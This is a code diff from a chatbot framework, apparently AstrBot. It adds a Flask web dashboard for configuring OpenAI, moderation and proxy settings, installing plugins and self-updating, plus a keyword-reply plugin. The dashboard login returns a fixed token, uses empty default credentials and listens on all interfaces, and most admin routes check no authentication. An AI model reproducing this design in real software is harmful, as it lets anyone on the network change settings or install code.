description="OpenAI top_p。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['top_p'],
|
||||
path="openai.chatGPTConfigs.top_p",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI frequency_penalty",
|
||||
description="OpenAI frequency_penalty。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['frequency_penalty'],
|
||||
path="openai.chatGPTConfigs.frequency_penalty",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI presence_penalty",
|
||||
description="OpenAI presence_penalty。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['presence_penalty'],
|
||||
path="openai.chatGPTConfigs.presence_penalty",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="OpenAI 总生成长度限制",
|
||||
description="OpenAI 总生成长度限制。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['total_tokens_limit'],
|
||||
path="openai.total_tokens_limit",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成模型",
|
||||
description="OpenAI 图像生成模型。",
|
||||
value=config['openai_image_generate']['model'],
|
||||
path="openai_image_generate.model",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成大小",
|
||||
description="OpenAI 图像生成大小。",
|
||||
value=config['openai_image_generate']['size'],
|
||||
path="openai_image_generate.size",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成风格",
|
||||
description="OpenAI 图像生成风格。修改前请参考 OpenAI 官方文档",
|
||||
value=config['openai_image_generate']['style'],
|
||||
path="openai_image_generate.style",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI 图像生成质量",
|
||||
description="OpenAI 图像生成质量。修改前请参考 OpenAI 官方文档",
|
||||
value=config['openai_image_generate']['quality'],
|
||||
path="openai_image_generate.quality",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="问题题首提示词",
|
||||
description="如果填写了此项,在每个对大语言模型的请求中,都会在问题前加上此提示词。",
|
||||
value=config['llm_env_prompt'],
|
||||
path="llm_env_prompt",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="默认人格文本",
|
||||
description="默认人格文本",
|
||||
value=config['default_personality_str'],
|
||||
path="default_personality_str",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
baidu_aip_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="百度内容审核",
|
||||
description="需要去申请",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启动百度内容审核服务",
|
||||
description="",
|
||||
value=config['baidu_aip']['enable'],
|
||||
path="baidu_aip.enable"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="APP ID",
|
||||
description="",
|
||||
value=config['baidu_aip']['app_id'],
|
||||
path="baidu_aip.app_id"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="API KEY",
|
||||
description="",
|
||||
value=config['baidu_aip']['api_key'],
|
||||
path="baidu_aip.api_key"
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="SECRET KEY",
|
||||
description="",
|
||||
value=config['baidu_aip']['secret_key'],
|
||||
path="baidu_aip.secret_key"
|
||||
)
|
||||
]
|
||||
)
|
||||
|
||||
other_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="其他配置",
|
||||
description="其他配置描述",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTP 代理地址",
|
||||
description="建议上下一致",
|
||||
value=config['http_proxy'],
|
||||
path="http_proxy",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTPS 代理地址",
|
||||
description="建议上下一致",
|
||||
value=config['https_proxy'],
|
||||
path="https_proxy",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="面板用户名",
|
||||
description="是的,就是你理解的这个面板的用户名",
|
||||
value=config['dashboard_username'],
|
||||
path="dashboard_username",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
dashboard_data.configs['data'] = [
|
||||
qq_official_platform_group,
|
||||
qq_gocq_platform_group,
|
||||
general_platform_detail_group,
|
||||
openai_official_llm_group,
|
||||
other_group,
|
||||
baidu_aip_group
|
||||
]
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"配置文件解析错误:{e}")
|
||||
raise e
|
||||
|
||||
def save_config(self, post_config: list, namespace: str):
|
||||
'''
|
||||
根据 path 解析并保存配置
|
||||
'''
|
||||
|
||||
queue = post_config
|
||||
while len(queue) > 0:
|
||||
config = queue.pop(0)
|
||||
if config['config_type'] == "group":
|
||||
for item in config['body']:
|
||||
queue.append(item)
|
||||
elif config['config_type'] == "item":
|
||||
if config['path'] is None or config['path'] == "":
|
||||
continue
|
||||
|
||||
path = config['path'].split('.')
|
||||
if len(path) == 0:
|
||||
continue
|
||||
|
||||
if config['val_type'] == "bool":
|
||||
self._write_config(
|
||||
namespace, config['path'], config['value'])
|
||||
elif config['val_type'] == "str":
|
||||
self._write_config(
|
||||
namespace, config['path'], config['value'])
|
||||
elif config['val_type'] == "int":
|
||||
try:
|
||||
self._write_config(
|
||||
namespace, config['path'], int(config['value']))
|
||||
                    except (TypeError, ValueError):
|
||||
raise ValueError(f"配置项 {config['name']} 的值必须是整数")
|
||||
elif config['val_type'] == "float":
|
||||
try:
|
||||
self._write_config(
|
||||
namespace, config['path'], float(config['value']))
|
||||
                    except (TypeError, ValueError):
|
||||
raise ValueError(f"配置项 {config['name']} 的值必须是浮点数")
|
||||
elif config['val_type'] == "list":
|
||||
if config['value'] is None:
|
||||
self._write_config(namespace, config['path'], [])
|
||||
                    elif not isinstance(config['value'], list):
                        raise ValueError(f"配置项 {config['name']} 的值必须是列表")
                    else:
                        self._write_config(
                            namespace, config['path'], config['value'])
|
||||
else:
|
||||
raise NotImplementedError(
|
||||
f"未知或者未实现的配置项类型:{config['val_type']}")
|
||||
|
||||
def _write_config(self, namespace: str, key: str, value):
|
||||
if namespace == "" or namespace.startswith("internal_"):
|
||||
# 机器人自带配置,存到 config.yaml
|
||||
self.cc.put_by_dot_str(key, value)
|
||||
else:
|
||||
update_config(namespace, key, value)
|
||||
|
||||
def run(self):
|
||||
self.dashboard.run()
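
save_config above walks the nested groups and hands each item's dot-separated path to CmdConfig.put_by_dot_str (built-in namespaces) or update_config (plugin namespaces). Neither implementation appears in this diff; the following is a minimal sketch of the kind of dot-path write they are expected to perform, against a hypothetical in-memory dict standing in for cmd_config.json.

# Illustrative only: CmdConfig.put_by_dot_str is not shown in this diff, so this
# sketches the dot-path update that save_config relies on. The `config` dict is a
# hypothetical stand-in for the parsed contents of cmd_config.json.
from typing import Any


def put_by_dot_str(config: dict, dot_path: str, value: Any) -> None:
    """Set config['a']['b']['c'] = value for dot_path 'a.b.c', creating levels as needed."""
    keys = dot_path.split(".")
    node = config
    for key in keys[:-1]:
        node = node.setdefault(key, {})
    node[keys[-1]] = value


config = {"openai": {"chatGPTConfigs": {"model": "gpt-3.5-turbo"}}}
put_by_dot_str(config, "openai.chatGPTConfigs.model", "gpt-4")
put_by_dot_str(config, "qqbot.enable", True)
print(config["openai"]["chatGPTConfigs"]["model"])  # gpt-4
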
476  addons/dashboard/server.py  Normal file
@@ -0,0 +1,476 @@
import util.plugin_util as putil
|
||||
import websockets
|
||||
import json
|
||||
import threading
|
||||
import asyncio
|
||||
import os
|
||||
import sys
|
||||
import time
|
||||
|
||||
from flask import Flask, request
|
||||
from flask.logging import default_handler
|
||||
from werkzeug.serving import make_server
|
||||
from util import general_utils as gu
|
||||
from dataclasses import dataclass
|
||||
from persist.session import dbConn
|
||||
from type.register import RegisteredPlugin
|
||||
from typing import List
|
||||
from util.cmd_config import CmdConfig
|
||||
from util.updator import check_update, update_project, request_release_info
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
@dataclass
|
||||
class DashBoardData():
|
||||
stats: dict
|
||||
configs: dict
|
||||
logs: dict
|
||||
plugins: List[RegisteredPlugin]
|
||||
|
||||
|
||||
@dataclass
|
||||
class Response():
|
||||
status: str
|
||||
message: str
|
||||
data: dict
|
||||
|
||||
|
||||
class AstrBotDashBoard():
|
||||
def __init__(self, global_object: 'gu.GlobalObject'):
|
||||
self.global_object = global_object
|
||||
self.loop = asyncio.get_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
self.dashboard_data: DashBoardData = global_object.dashboard_data
|
||||
self.dashboard_be = Flask(
|
||||
__name__, static_folder="dist", static_url_path="/")
|
||||
self.funcs = {}
|
||||
self.cc = CmdConfig()
|
||||
self.ws_clients = {} # remote_ip: ws
|
||||
# 启动 websocket 服务器
|
||||
self.ws_server = websockets.serve(self.__handle_msg, "0.0.0.0", 6186)
|
||||
|
||||
@self.dashboard_be.get("/")
|
||||
def index():
|
||||
# 返回页面
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/config")
|
||||
def rt_config():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/logs")
|
||||
def rt_logs():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/extension")
|
||||
def rt_extension():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.get("/dashboard/default")
|
||||
def rt_dashboard():
|
||||
return self.dashboard_be.send_static_file("index.html")
|
||||
|
||||
@self.dashboard_be.post("/api/authenticate")
|
||||
def authenticate():
|
||||
username = self.cc.get("dashboard_username", "")
|
||||
password = self.cc.get("dashboard_password", "")
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["username"] == username and post_data["password"] == password:
|
||||
return Response(
|
||||
status="success",
|
||||
message="登录成功。",
|
||||
data={
|
||||
"token": "astrbot-test-token",
|
||||
"username": username
|
||||
}
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="用户名或密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/change_password")
|
||||
def change_password():
|
||||
password = self.cc.get("dashboard_password", "")
|
||||
# 获得请求体
|
||||
post_data = request.json
|
||||
if post_data["password"] == password:
|
||||
self.cc.put("dashboard_password", post_data["new_password"])
|
||||
return Response(
|
||||
status="success",
|
||||
message="修改成功。",
|
||||
data=None
|
||||
).__dict__
|
||||
else:
|
||||
return Response(
|
||||
status="error",
|
||||
message="原密码错误。",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/stats")
|
||||
def get_stats():
|
||||
db_inst = dbConn()
|
||||
all_session = db_inst.get_all_stat_session()
|
||||
last_24_message = db_inst.get_last_24h_stat_message()
|
||||
# last_24_platform = db_inst.get_last_24h_stat_platform()
|
||||
platforms = db_inst.get_platform_cnt_total()
|
||||
self.dashboard_data.stats["session"] = []
|
||||
self.dashboard_data.stats["session_total"] = db_inst.get_session_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["message"] = last_24_message
|
||||
self.dashboard_data.stats["message_total"] = db_inst.get_message_cnt_total(
|
||||
)
|
||||
self.dashboard_data.stats["platform"] = platforms
|
||||
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=self.dashboard_data.stats
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/configs")
|
||||
def get_configs():
|
||||
# 如果params中有namespace,则返回该namespace下的配置
|
||||
# 否则返回所有配置
|
||||
namespace = "" if "namespace" not in request.args else request.args["namespace"]
|
||||
conf = self._get_configs(namespace)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=conf
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/config_outline")
|
||||
def get_config_outline():
|
||||
outline = self._generate_outline()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=outline
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/configs")
|
||||
def post_configs():
|
||||
post_configs = request.json
|
||||
try:
|
||||
self.funcs["post_configs"](post_configs)
|
||||
return Response(
|
||||
status="success",
|
||||
message="保存成功~ 机器人将在 2 秒内重启以应用新的配置。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=self.dashboard_data.configs
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/extensions")
|
||||
def get_plugins():
|
||||
_plugin_resp = []
|
||||
for plugin in self.dashboard_data.plugins:
|
||||
_p = plugin.metadata
|
||||
_t = {
|
||||
"name": _p.plugin_name,
|
||||
"repo": '' if _p.repo is None else _p.repo,
|
||||
"author": _p.author,
|
||||
"desc": _p.desc,
|
||||
"version": _p.version
|
||||
}
|
||||
_plugin_resp.append(_t)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=_plugin_resp
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/install")
|
||||
def install_plugin():
|
||||
post_data = request.json
|
||||
repo_url = post_data["url"]
|
||||
try:
|
||||
logger.info(f"正在安装插件 {repo_url}")
|
||||
putil.install_plugin(repo_url, self.dashboard_data.plugins)
|
||||
logger.info(f"安装插件 {repo_url} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="安装成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/uninstall")
|
||||
def uninstall_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在卸载插件 {plugin_name}")
|
||||
putil.uninstall_plugin(
|
||||
plugin_name, self.dashboard_data.plugins)
|
||||
logger.info(f"卸载插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="卸载成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/extensions/update")
|
||||
def update_plugin():
|
||||
post_data = request.json
|
||||
plugin_name = post_data["name"]
|
||||
try:
|
||||
logger.info(f"正在更新插件 {plugin_name}")
|
||||
putil.update_plugin(plugin_name, self.dashboard_data.plugins)
|
||||
logger.info(f"更新插件 {plugin_name} 成功")
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功~",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/log")
|
||||
def log():
|
||||
for item in self.ws_clients:
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
self.ws_clients[item].send(request.data.decode()), self.loop)
|
||||
except Exception as e:
|
||||
pass
|
||||
return 'ok'
|
||||
|
||||
@self.dashboard_be.get("/api/check_update")
|
||||
def get_update_info():
|
||||
try:
|
||||
ret = check_update()
|
||||
return Response(
|
||||
status="success",
|
||||
message=ret,
|
||||
data={
|
||||
"has_new_version": ret != "当前已经是最新版本。" # 先这样吧,累了=.=
|
||||
}
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.post("/api/update_project")
|
||||
def update_project_api():
|
||||
version = request.json['version']
|
||||
if version == "" or version == "latest":
|
||||
latest = True
|
||||
version = ''
|
||||
else:
|
||||
latest = False
|
||||
try:
|
||||
update_project(request_release_info(latest),
|
||||
latest=latest, version=version)
|
||||
threading.Thread(target=self.shutdown_bot, args=(3,)).start()
|
||||
return Response(
|
||||
status="success",
|
||||
message="更新成功,机器人将在 3 秒内重启。",
|
||||
data=None
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm/list")
|
||||
def llm_list():
|
||||
ret = []
|
||||
for llm in self.global_object.llms:
|
||||
ret.append(llm.llm_name)
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
|
||||
@self.dashboard_be.get("/api/llm")
|
||||
def llm():
|
||||
text = request.args["text"]
|
||||
llm = request.args["llm"]
|
||||
for llm_ in self.global_object.llms:
|
||||
if llm_.llm_name == llm:
|
||||
try:
|
||||
# ret = await llm_.llm_instance.text_chat(text)
|
||||
ret = asyncio.run_coroutine_threadsafe(
|
||||
llm_.llm_instance.text_chat(text), self.loop).result()
|
||||
return Response(
|
||||
status="success",
|
||||
message="",
|
||||
data=ret
|
||||
).__dict__
|
||||
except Exception as e:
|
||||
return Response(
|
||||
status="error",
|
||||
message=e.__str__(),
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
return Response(
|
||||
status="error",
|
||||
message="LLM not found.",
|
||||
data=None
|
||||
).__dict__
|
||||
|
||||
def shutdown_bot(self, delay_s: int):
|
||||
time.sleep(delay_s)
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
|
||||
def _get_configs(self, namespace: str):
|
||||
if namespace == "":
|
||||
ret = [self.dashboard_data.configs['data'][4],
|
||||
self.dashboard_data.configs['data'][5],]
|
||||
elif namespace == "internal_platform_qq_official":
|
||||
ret = [self.dashboard_data.configs['data'][0],]
|
||||
elif namespace == "internal_platform_qq_gocq":
|
||||
ret = [self.dashboard_data.configs['data'][1],]
|
||||
elif namespace == "internal_platform_general": # 全局平台配置
|
||||
ret = [self.dashboard_data.configs['data'][2],]
|
||||
elif namespace == "internal_llm_openai_official":
|
||||
ret = [self.dashboard_data.configs['data'][3],]
|
||||
else:
|
||||
path = f"data/config/{namespace}.json"
|
||||
if not os.path.exists(path):
|
||||
return []
|
||||
with open(path, "r", encoding="utf-8-sig") as f:
|
||||
ret = [{
|
||||
"config_type": "group",
|
||||
"name": namespace + " 插件配置",
|
||||
"description": "",
|
||||
"body": list(json.load(f).values())
|
||||
},]
|
||||
return ret
|
||||
|
||||
def _generate_outline(self):
|
||||
'''
|
||||
生成配置大纲。目前分为 platform(消息平台配置) 和 llm(语言模型配置) 两大类。
|
||||
插件的info函数中如果带了plugin_type字段,则会被归类到对应的大纲中。目前仅支持 platform 和 llm 两种类型。
|
||||
'''
|
||||
outline = [
|
||||
{
|
||||
"type": "platform",
|
||||
"name": "配置通用消息平台",
|
||||
"body": [
|
||||
{
|
||||
"title": "通用",
|
||||
"desc": "通用平台配置",
|
||||
"namespace": "internal_platform_general",
|
||||
"tag": ""
|
||||
},
|
||||
{
|
||||
"title": "QQ_OFFICIAL",
|
||||
"desc": "QQ官方API,仅支持频道",
|
||||
"namespace": "internal_platform_qq_official",
|
||||
"tag": ""
|
||||
},
|
||||
{
|
||||
"title": "OneBot协议",
|
||||
"desc": "支持cq-http、shamrock等(目前仅支持QQ平台)",
|
||||
"namespace": "internal_platform_qq_gocq",
|
||||
"tag": ""
|
||||
}
|
||||
]
|
||||
},
|
||||
{
|
||||
"type": "llm",
|
||||
"name": "配置 LLM",
|
||||
"body": [
|
||||
{
|
||||
"title": "OpenAI Official",
|
||||
"desc": "也支持使用官方接口的中转服务",
|
||||
"namespace": "internal_llm_openai_official",
|
||||
"tag": ""
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
for plugin in self.global_object.cached_plugins:
|
||||
for item in outline:
|
||||
if item['type'] == plugin.metadata.plugin_type:
|
||||
item['body'].append({
|
||||
"title": plugin.metadata.plugin_name,
|
||||
"desc": plugin.metadata.desc,
|
||||
"namespace": plugin.metadata.plugin_name,
|
||||
"tag": plugin.metadata.plugin_name
|
||||
})
|
||||
return outline
|
||||
|
||||
def register(self, name: str):
|
||||
def decorator(func):
|
||||
self.funcs[name] = func
|
||||
return func
|
||||
return decorator
|
||||
|
||||
async def get_log_history(self):
|
||||
try:
|
||||
with open("logs/astrbot-core/astrbot-core.log", "r", encoding="utf-8") as f:
|
||||
return f.readlines()[-100:]
|
||||
except Exception as e:
|
||||
logger.warning(f"读取日志历史失败: {e.__str__()}")
|
||||
return []
|
||||
|
||||
async def __handle_msg(self, websocket, path):
|
||||
address = websocket.remote_address
|
||||
self.ws_clients[address] = websocket
|
||||
data = await self.get_log_history()
|
||||
data = ''.join(data).replace('\n', '\r\n')
|
||||
await websocket.send(data)
|
||||
while True:
|
||||
try:
|
||||
msg = await websocket.recv()
|
||||
except websockets.exceptions.ConnectionClosedError:
|
||||
# logger.info(f"和 {address} 的 websocket 连接已断开")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
except Exception as e:
|
||||
# logger.info(f"和 {path} 的 websocket 连接发生了错误: {e.__str__()}")
|
||||
del self.ws_clients[address]
|
||||
break
|
||||
|
||||
def run_ws_server(self, loop):
|
||||
asyncio.set_event_loop(loop)
|
||||
loop.run_until_complete(self.ws_server)
|
||||
loop.run_forever()
|
||||
|
||||
def run(self):
|
||||
threading.Thread(target=self.run_ws_server, args=(self.loop,)).start()
|
||||
logger.info("已启动 websocket 服务器")
|
||||
ip_address = gu.get_local_ip_addresses()
|
||||
ip_str = f"http://{ip_address}:6185\n\thttp://localhost:6185"
|
||||
logger.info(
|
||||
f"\n==================\n您可访问:\n\n\t{ip_str}\n\n来登录可视化面板,默认账号密码为空。\n注意: 所有配置项现已全量迁移至 cmd_config.json 文件下,可登录可视化面板在线修改配置。\n==================\n")
|
||||
|
||||
http_server = make_server(
|
||||
'0.0.0.0', 6185, self.dashboard_be, threaded=True)
|
||||
http_server.serve_forever()
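
The Flask routes above make up the whole dashboard API surface: every handler returns a Response(status, message, data) serialized via __dict__. A minimal client-side sketch, assuming a locally running bot on the default port 6185 with the default empty credentials; the third-party requests package used here is an assumption for this example only.

# Minimal usage sketch of the dashboard HTTP API defined above (assumptions noted in the lead-in).
import requests

BASE = "http://localhost:6185"

# POST /api/authenticate -> {"status": ..., "message": ..., "data": {"token": ..., "username": ...}} on success
auth = requests.post(f"{BASE}/api/authenticate",
                     json={"username": "", "password": ""}).json()
print(auth["status"], auth["message"])

# GET /api/stats -> aggregated session/message/platform counters collected from the persistence layer
stats = requests.get(f"{BASE}/api/stats").json()
print(stats["data"]["message_total"], stats["data"]["session_total"])
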
168  addons/plugins/helloworld/helloworld.py  Normal file
@@ -0,0 +1,168 @@
import os
|
||||
import shutil
import json  # used below for loading/saving data/keyword.json
from nakuru.entities.components import *
|
||||
flag_not_support = False
|
||||
try:
|
||||
from util.plugin_dev.api.v1.config import *
|
||||
from util.plugin_dev.api.v1.bot import (
|
||||
AstrMessageEvent,
|
||||
CommandResult,
|
||||
)
|
||||
except ImportError:
|
||||
flag_not_support = True
|
||||
print("导入接口失败。请升级到 AstrBot 最新版本。")
|
||||
|
||||
|
||||
'''
|
||||
注意改插件名噢!格式:XXXPlugin 或 Main
|
||||
小提示:把此模板仓库 fork 之后 clone 到机器人文件夹下的 addons/plugins/ 目录下,然后用 Pycharm/VSC 等工具打开可获更棒的编程体验(自动补全等)
|
||||
'''
|
||||
|
||||
|
||||
class HelloWorldPlugin:
|
||||
"""
|
||||
初始化函数, 可以选择直接pass
|
||||
"""
|
||||
|
||||
def __init__(self) -> None:
|
||||
# 复制旧配置文件到 data 目录下。
|
||||
if os.path.exists("keyword.json"):
|
||||
shutil.move("keyword.json", "data/keyword.json")
|
||||
self.keywords = {}
|
||||
if os.path.exists("data/keyword.json"):
|
||||
self.keywords = json.load(open("data/keyword.json", "r"))
|
||||
else:
|
||||
self.save_keyword()
|
||||
|
||||
"""
|
||||
机器人程序会调用此函数。
|
||||
返回规范: bool: 插件是否响应该消息 (所有的消息均会调用每一个载入的插件, 如果不响应, 则应返回 False)
|
||||
Tuple: None 或者长度为 3 的元组。如果不响应, 返回 None; 如果响应, 第 1 个参数为指令是否调用成功, 第 2 个参数为返回的消息链列表, 第 3 个参数为指令名称
|
||||
例子:一个名为"yuanshen"的插件;当接收到消息为“原神 可莉”, 如果不想要处理此消息,则返回False, None;如果想要处理,但是执行失败了,返回True, tuple([False, "请求失败。", "yuanshen"]) ;执行成功了,返回True, tuple([True, "结果文本", "yuanshen"])
|
||||
"""
|
||||
|
||||
def run(self, ame: AstrMessageEvent):
|
||||
if ame.message_str == "helloworld":
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=[Plain("Hello World!!")],
|
||||
command_name="helloworld"
|
||||
)
|
||||
if ame.message_str.startswith("/keyword") or ame.message_str.startswith("keyword"):
|
||||
return self.handle_keyword_command(ame)
|
||||
|
||||
ret = self.check_keyword(ame.message_str)
|
||||
if ret:
|
||||
return ret
|
||||
|
||||
return CommandResult(
|
||||
hit=False,
|
||||
success=False,
|
||||
message_chain=None,
|
||||
command_name=None
|
||||
)
|
||||
|
||||
def handle_keyword_command(self, ame: AstrMessageEvent):
|
||||
l = ame.message_str.split(" ")
|
||||
|
||||
# 获取图片
|
||||
image_url = ""
|
||||
for comp in ame.message_obj.message:
|
||||
if isinstance(comp, Image) and image_url == "":
|
||||
if comp.url is None:
|
||||
image_url = comp.file
|
||||
else:
|
||||
image_url = comp.url
|
||||
|
||||
command_result = CommandResult(
|
||||
hit=True,
|
||||
success=False,
|
||||
message_chain=None,
|
||||
command_name="keyword"
|
||||
)
|
||||
if len(l) == 1 or (len(l) == 2 and image_url == ""):
|
||||
ret = """【设置关键词回复】
|
||||
示例:
|
||||
1. keyword <触发词> <回复词>
|
||||
keyword hi 你好
|
||||
发送 hi 回复你好
|
||||
* 回复词支持图片
|
||||
|
||||
2. keyword d <触发词>
|
||||
keyword d hi
|
||||
删除 hi 触发词产生的回复"""
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain(ret)]
|
||||
return command_result
|
||||
elif len(l) == 3 and l[1] == "d":
|
||||
if l[2] not in self.keywords:
|
||||
command_result.message_chain = [Plain(f"关键词 {l[2]} 不存在")]
|
||||
return command_result
|
||||
self.keywords.pop(l[2])
|
||||
self.save_keyword()
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain("删除成功")]
|
||||
return command_result
|
||||
else:
|
||||
self.keywords[l[1]] = {
|
||||
"plain_text": " ".join(l[2:]),
|
||||
"image_url": image_url
|
||||
}
|
||||
self.save_keyword()
|
||||
command_result.success = True
|
||||
command_result.message_chain = [Plain("设置成功")]
|
||||
return command_result
|
||||
|
||||
def save_keyword(self):
|
||||
json.dump(self.keywords, open(
|
||||
"data/keyword.json", "w"), ensure_ascii=False)
|
||||
|
||||
def check_keyword(self, message_str: str):
|
||||
for k in self.keywords:
|
||||
if message_str == k:
|
||||
plain_text = ""
|
||||
if 'plain_text' in self.keywords[k]:
|
||||
plain_text = self.keywords[k]['plain_text']
|
||||
else:
|
||||
plain_text = self.keywords[k]
|
||||
image_url = ""
|
||||
if 'image_url' in self.keywords[k]:
|
||||
image_url = self.keywords[k]['image_url']
|
||||
if image_url != "":
|
||||
res = [Plain(plain_text), Image.fromURL(image_url)]
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=res,
|
||||
command_name="keyword"
|
||||
)
|
||||
return CommandResult(
|
||||
hit=True,
|
||||
success=True,
|
||||
message_chain=[Plain(plain_text)],
|
||||
command_name="keyword"
|
||||
)
|
||||
|
||||
"""
|
||||
插件元信息。
|
||||
当用户输入 plugin v 插件名称 时,会调用此函数,返回帮助信息。
|
||||
返回参数要求(必填):dict{
|
||||
"name": str, # 插件名称
|
||||
"desc": str, # 插件简短描述
|
||||
"help": str, # 插件帮助信息
|
||||
"version": str, # 插件版本
|
||||
"author": str, # 插件作者
|
||||
"repo": str, # 插件仓库地址 [ 可选 ]
|
||||
"homepage": str, # 插件主页 [ 可选 ]
|
||||
}
|
||||
"""
|
||||
|
||||
def info(self):
|
||||
return {
|
||||
"name": "helloworld",
|
||||
"desc": "这是 AstrBot 的默认插件,支持关键词回复。",
|
||||
"help": "输入 /keyword 查看关键词回复帮助。",
|
||||
"version": "v1.3",
|
||||
"author": "Soulter"
|
||||
}
|
||||
@@ -1,29 +0,0 @@
|
||||
from revChatGPT.V1 import Chatbot
|
||||
|
||||
class revChatGPT:
|
||||
def __init__(self, config):
|
||||
|
||||
print("[RevChatGPT] 逆向库初始化:"+str(config))
|
||||
config['password'] = str(config['password'])
|
||||
self.chatbot = Chatbot(config=config)
|
||||
|
||||
def chat(self, prompt):
|
||||
resp = ''
|
||||
|
||||
err_count = 0
|
||||
retry_count = 5
|
||||
|
||||
while err_count < retry_count:
|
||||
try:
|
||||
for data in self.chatbot.ask(prompt):
|
||||
resp = data["message"]
|
||||
break
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
